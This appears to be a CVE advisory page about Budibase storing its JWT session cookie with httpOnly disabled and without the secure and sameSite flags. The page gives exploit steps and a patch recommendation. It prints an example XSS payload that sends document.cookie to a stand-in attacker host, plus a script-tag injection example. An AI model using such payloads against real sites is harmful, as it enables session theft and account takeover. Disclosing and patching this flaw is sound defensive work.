Budibase, Insecure Cookie Settings, GHSA-4f9j-vr4p-642r (Critical)

Listen to this Post

The `budibase:auth` cookie, which stores the user’s JWT session token, is configured with `httpOnly: false` in `packages/backend-core/src/utils/utils.ts` (lines 215-226). This flag is meant to prevent JavaScript from accessing the cookie, which is a critical defense against XSS attacks. The function `ctx.cookies.set(name, value, config)` uses a configuration object where `httpOnly: false` is explicitly set, allowing client-side scripts to read the token. The cookie also lacks the `secure: true` flag, meaning it can be sent over unencrypted HTTP connections, and has no `sameSite` attribute, making it vulnerable to cross-site request forgery. Any XSS vulnerability, such as the stored XSS identified in GHSA-gp5x-2v54-v2q5 (published April 2, 2026), can now be exploited to steal the JWT token, leading to persistent account takeover. Once the attacker obtains the token, they can maintain access to the victim’s account indefinitely.

dailycve form

Platform: `Budibase`
Version: `Backend Core <3.35.10` Vulnerability : `Missing HttpOnly Flag` Severity: `Critical` date: `2026-04-24`

Prediction: `Patch: Version 3.35.10`

What Undercode Say

To check if your deployment is vulnerable, you can use the following bash command to examine the cookie configuration:

grep -n "httpOnly: false" packages/backend-core/src/utils/utils.ts

To simulate an attacker stealing a cookie via XSS, a simple JavaScript payload can be used:

new Image().src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);

Exploit

  1. An attacker creates a malicious entity name containing an XSS payload (e.g., <script>stealCookie()</script>), exploiting the stored XSS vulnerability (GHSA-gp5x-2v54-v2q5).
  2. A victim with a `budibase:auth` cookie set to `httpOnly: false` views the malicious entity.
  3. The XSS payload executes in the victim’s browser, reading the cookie via document.cookie.
  4. The attacker exfiltrates the JWT token and uses it to gain persistent access to the victim’s account.

Protection from this CVE

  • Upgrade to version 3.35.10 or later of the `@budibase/backend-core` package, where the issue is fixed.
  • If immediate upgrade is not possible, manually modify the cookie configuration in `packages/backend-core/src/utils/utils.ts` to set httpOnly: true, secure: true, and sameSite: 'lax'.
  • Ensure your Budibase deployment uses HTTPS to benefit from the `secure: true` flag.
  • Apply all security patches, including those for XSS vulnerabilities.

Impact

Every XSS vulnerability in Budibase becomes a full account takeover, as the attacker can steal the JWT token and maintain persistent access. This affects all deployments where the cookie configuration is hardcoded, leading to potential data breaches, unauthorized actions, and complete compromise of the affected system.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top